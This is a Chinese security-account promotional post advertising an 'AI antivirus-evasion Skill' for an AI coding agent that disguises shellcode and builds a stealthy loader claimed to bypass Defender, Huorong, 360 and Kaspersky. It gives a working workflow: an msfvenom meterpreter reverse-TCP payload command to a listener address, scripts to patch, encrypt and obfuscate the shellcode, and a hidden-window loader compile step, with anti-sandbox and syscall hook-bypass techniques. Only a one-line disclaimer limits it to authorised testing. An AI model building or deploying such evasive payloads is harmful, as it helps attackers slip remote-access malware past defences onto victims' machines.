AI 免杀 Skill,多层加密 + 指令混淆,轻松过 Defender / 火绒 / 360
0x01 工具介绍
在攻防对抗日益激烈的当下,传统免杀手段极易被特征库与行为检测拦截。本次首发 AI 免杀 Skill,围绕 Shellcode 深度优化,通过多层加密、指令替换、花指令注入与格式混淆,大幅降低代码特征暴露风险。同时结合反沙箱、内存保护、Syscall 绕过等 Loader 技术,实现对 Windows Defender、火绒、360 等主流安全软件的高效绕过,为安全研究与实战攻防提供一套完整可用的免杀实践方案。
注意:现在只对常读和星标的公众号才展示大图推送,建议大家把渗透安全HackTwo"设为星标⭐️"否则可能就看不到了啦!
下载地址在末尾 #渗透安全HackTwo
0x02 功能介绍
✨Skill功能说明
1. Shellcode 处理
Patch:同义指令替换、花指令注入、指令重排
加密:自定义加密算法,支持多层加密
混淆:伪装成UUID、IPv4/IPv6地址等格式
2. Loader 技术
反沙箱检测:识别虚拟机和沙箱环境
VEH内存保护:利用异常处理规避内存扫描
Syscall绕过:使用系统底层调用绕过用户层Hook
隐蔽运行:无窗口执行、后台运行
目录结构
0x03 更新介绍
已更绕过主流杀软和EDR检测0x04 使用介绍
📦基础使用
1. 准备工作
# 生成原始Shellcode(示例) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shellcode_raw.bin2. 处理Shellcode
# Patch Shellcode python .trae/skills/ai-av-evasion/scripts/shellcode-patch.py shellcode_raw.bin # 加密Shellcode python .trae/skills/ai-av-evasion/scripts/shellcode-encrypt.py shellcode_patched.bin mysecretkey # 混淆Shellcode python .trae/skills/ai-av-evasion/scripts/shellcode-obfuscate.py shellcode_encrypted.bin3. 编写Loader
修改
loader.c中的解密和反混淆逻辑编译Loader:
gcc -o loader.exe loader.c -mwindows
4. 测试评估
使用VT等在线检测工具测试
在安装了主流杀软的环境中测试
测试结果
免杀效果
Windows Defender:通过
火绒:通过
360安全卫士:通过
卡巴斯基:通过
VirusTotal:95%以上免杀率
执行效果
反沙箱:成功识别沙箱环境
内存保护:成功规避内存扫描
Syscall绕过:成功绕过用户层Hook
隐蔽性:无窗口执行,后台运行
注意事项
合法性:本工具仅用于授权的安全测试和渗透评估
安全性:使用后请及时清理测试环境,避免造成安全隐患
时效性:免杀技术会随着杀软的更新而失效,需要定期更新免杀策略
创新性:结合最新的免杀技术,不断优化和改进免杀方案
下载
公众号回复20260407获取下载